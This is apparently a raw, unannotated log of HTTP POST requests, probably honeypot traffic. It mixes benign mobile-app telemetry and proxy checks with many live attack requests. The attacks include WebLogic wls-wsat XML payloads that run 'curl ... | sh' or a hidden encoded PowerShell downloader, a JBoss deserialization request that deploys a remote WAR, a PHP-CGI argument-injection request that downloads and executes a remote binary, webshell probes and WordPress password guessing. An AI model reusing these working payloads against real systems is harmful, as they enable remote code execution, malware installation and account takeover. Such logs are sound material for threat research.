POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495542390272&chk=7d2ac04d HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream

345
ã•ñÀ™#Gܘy
ÔÉÇJ%UI
^fHvŸ◊EïrÜ∆ìź}‘Ÿe—ncÉ
v√áÙ_Ù˛Ì˙Â˚Ì€ß+a™Ä)]mI6,ó±"fi˛∫˚◊∑Ì˛·⁄ñVì9ÚéVY∑˜œº}ú◊∫2•.JÍÏS°ŸXPöçZuMæ›ˇæø›Áü◊d∑Oüßø_˚¬ø˛˛Û„áÔ~Âü‚ı√˚ˇÒÜ∏Êuxˆe0Ω!∞imñ†eÎú—zÌ4_(m¨õüõ匔`xQ‡9&òâ
ÒrR§±¥ø0üy–ÛÙ·√›¨îÛ°∂46◊zó9UçÂ4]R⁄‚Õ|ò«∏¥…)¶Rdc@€ïäS™Ø1Ï4è\RàÁ©˘êe ‹§`Œ,A¶|—hfi1ƒ}ûá.Ñ[ÊMéۨ&È%Ù≥Ô´ÁçS‘mı˘¬|B?R6Œáyº$ï~ü•‰–OG0Õ
£:ÊBsß”<ÂíÍì˛ía<8SÙ	ú
F˛¨=lóZi-’ÛÛ©ª~D6:æØQq(qÉ ùÅÀë᧋•VéˇüʱK [÷產3÷Bå|Æ)Öøö@Ɔ™pùrŒØÑòÎñÂ0èRCjΩ@ü!"F$–bI±ö&îÛ}<1‹“Ò}Ò–≤|u9KÏK#ßåTji qO¯+á§èÛ§—¥&âÁMb_)öC96Á≠œ.HŸœÚDçF8£<ì?µ©/∑
Ü5ˆ5gé˘Ëx¯]áùfi◊Œ≥á·ÜtòßÙ∆*M£flC:ëázñ÷≤≥4oƒßÛô“√_±≤„˘3∫PÛ™Ò<„Q]qo®ª,Q˜q∫flÈ—Ôô6:>	{≈<j£∏Jà∫€»‡e†◊’JßuöávÖflü–Oh“(Òp|Ø˚j—≈Ê`\√cn/Ey“q˝L‰∑ih]°üî„[‘}Y)Â¥xÚ:ÔظËã—Ò>ç8úaÏ˝
K∂fl?äl‡÷k»j® È˛⁄y(¬y√„<Ë´Ÿ~∆M˜ÿ晶azvl’VŒ‹^‚©[H(øÁ≥P—:"öáˆˇÓ√U†Ê¶Ç5Œ«√˜¸?‘ë‚j
0



POST http://check.proxyradar.com/azenv.php?auth=149379374641&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

785621
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

fff339d76446e5ea95f93fea927fda96
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB--


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

QqAIx9vOZXKfykIE3undb6dj0ANjgX8+umAQphqv7ZgHHU7TVXo/CAlIGEOKVzhUQcMRogvkfTKt4iATVPkZmu6tecrzsrCEOvUYy/oZouI5IVQqdg70H4hlIEeuOEPmVtHPAQtirX3zExHH3qFouU/98F5U1XY2zNUw27qGjV/xB2m9dnSETXkvy6e8iVlQVic7uqyA3NDiF+KMGvsU4q7/rjKMfNqlitz4qlyWuvPR/+jR8HE+bzRZTdhdwgmTW4f5q2206Iy+U+u7vv9WqWXGwi7wrD2CMgRWZJexHwcrLwCfilBYyG5Y/Z9oactCd+QqGXgG6HaX8rQgEj/O5KU0wnP4h7Q9utMf+vKr85q+joaNdq5tYlaDu4586S+iGBc=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
À6ªÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î_4Y›∆√«∆fl

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1078
Content-Type: multipart/form-data; boundary=mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

67734
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

117df4e508caa37924c63af4d2336b5d
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1--


POST http://check.proxyradar.com/azenv.php?auth=149666179119&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477786015288
X-Umeng-Sdk: Android/5.6.7 musical.ly%2F4.15.0+GT-N8013%2F6.0.1+4C6E14E635355D555E3144A6F51E9977
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip

2b7
1.05559e28267e58eb4c1000012@0bd721cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0b58ñ‹fiÄ∞·xúïíΩkAáá3wâá`Dv…!WX¨≈≠Û˝’ù!ƒhPØdvg6.ÓfiÜ[r´`´b'àç¯ó‰Ô∞	÷ˆÇ{Ò-r®3’¿˚ŒÔyfi^fÙ ‰úkO“sÂñb‘L`á≈ò≈(8z˜È≈E”™åü?…ã‹Vvw7.˜Í<µE±ÿʱà%ÏnV’N·∑ªœ
ºÅµa‘a6î!ÎF13Üj3‰Ülæn1,Ã-l»∞aπ$ê!ÿ§»0i®2V¿´9Ô±ÂDx§¨„ôñíf9≈iÍœhâV6Ó*Ñ)\fiflö ˛ˆ§J}]Wì˛ƒO˚®Meq.«nRÂ∂Eåb‹>\/µRóÓ){÷XÆmYÔçw¬√£◊flfièNfl∞≥uÔ&E∑·iËÁaÀèakÙ@Å®;ó7vñ@/¸~pı«‹YkøZ ]f·5D¥L1&É‘±l¿í4h$È@iÈ2≠qBΩ?øôµ-–©˝$∑\e…L£D¢D%s·€óÛívÓJ«ˇ¶+¸xRÆ¥ÈÚ¬/'ô]˚Kœ„∆–™uLpü1ΔîËflˇ\yÁt—"∫f?é·¢ÉèËhQ4Ä«&£ˇ1	‡lÍh·‘Äü´›‚t@000021cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0000 f8bded51422f4e7c6a822334c318cacc
0



POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

h=die('Hello, Peppa!');

POST http://check.proxyradar.com/azenv.php?auth=152385091647&a=PSCMN&i=1082785689&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

RfBek9jIMrjmTdOqXt2VZ4vjL9fQ54lmlFPB1cZ1U/4p8SS4WyiZE5M6xfNfLT9xat/DidJnGaqLb35Axiwye4PwqngJYEHYHdZZdkyhqxE4IFoG3MnLmNALmkssH0f2iq6GNNJZoXndx+pd8MBWaL26iSslPkKmGq+R71w2N4cUZ5bHE6pTmilUgTx+Vb//JjDL8bjPN1LtkwRlyrEcvX/2xFnmIEZ/T8vD1G2+eGWk8SZfJI7/jDJsd049YSxUXAZZZZQuwL4P/kYx+xuSksRady+fWWhyl+c/cPntOG3NDLIi9KsdKtuBmMTtyQysoAUb/TsBO7YeS3DeicL77zH7bNXBsbwa3lgle2ug3CGmnBXR

POST http://check.proxyradar.com/azenv.php?auth=149376270899&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
À6ªÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î_4Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=152314491205&a=PSCMN&i=1082785710&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
%NñÁÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î~+Y›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149416744271&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

F6YIlNrAZ/2LOCGSVcSr9G+LgdXbo7NEf+l43Q1MDh0zKnIJhJOmTQvOOuNtZsUrJ7IZqPiY0VwRa/FBNosSaaJGLensl0AMCSLJaV4XHr5qwalBSam+PehTNWWTHqVW18nBvKT7jhM+uluzI/vIviEA93TJJg0lxLNYS0uJAxyQl4Yowj11VpebnHiA7s2xTZqiCkHNOclbZ6QMlgRhsZU4wPNGpU32L2xXFBD1tId2Qex5TPyGqEgWQIaaot14tr6MkUbdrwi7uI+htyGAtXlJSJtrGlxxhuhpa1q/m8yMcislwMYSzF+p+v5SXNV94UnglqH0CbekT/JvRQ5mdr6Ofvka6kcvrxGeq/gF3sKh9EskPrCrgA56oLkDgRx0KteP1at+tt91wL1QzTGjt8+/kF9Y9QYbqyTx1uMldmArlGM+xQ==

POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0

¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[	signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxp
srjava.net.URLñ%76¸‰rIhashCodeIportL	authorityq~
Lfileq~
Lhostq~
Lprotocolq~
Lrefq~
xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~thttppxur[Ljava.lang.String;≠“VÁÈ{Gxp
tjava.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
:µÃ©Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149396420799&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=xxxxxx

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

<? system("cd /tmp ; wget http://mafiagalati.hi2.ro/unix ; curl -O http://mafiagalati.hi2.ro/unix ; fetch http://mafiagalati.hi2.ro/unix ; chmod +x unix ; ./unix ; rm -rf unix "); ?>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=qwaszx

POST http://t11.proxy-checks.com/favicon.ico HTTP/1.1
Host: t11.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

BlvkxSdFVtnlNIFRT1yH86X0nsbNPTfjIf6wNYAfeHjfRx/M+ViwpYCiWWOZHd70d0a+hsgus8YhX+4ixthy4MyIgVpekTd0p0yeNzrFBT5Ug+VkzL1lYFx1MSKBdFByROo7vWSZ0EJXhKa+uC8U6C7eokW3ePYY/0L58mfJH/26I7xe0LakmjJaz4Sp50xmzLYIE9hJAmYfrQxD/jplvw0jHx8BES7PHX89BBI8LjMal1G/JN62GFgWM0EZXx4FDtPTBPeNz3G8NUlBZ6YnfxaedFeAK8zscqH6NCYHguhf/mH9XMRsB6Jl2XUpDpGduNDrTbiDVUBils3qw3rYJmsFuxIn6VFrg8tdLTsH+/sOEmzcsRM1k22nSs0MT2NpGA==

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1495362169294
X-Umeng-Sdk: Android/6.0.4 Subway+rush%2F1.1.1+MI+4LTE%2F4.4.4+BE6EA616F4A88C79AB737EB2C10FAA27
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 5058



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1049
Content-Type: multipart/form-data; boundary=WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

791011
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

e655030fcbff063fdbb8c9732f13c671
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /sdk HTTP/1.1
Content-Length: 441
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache

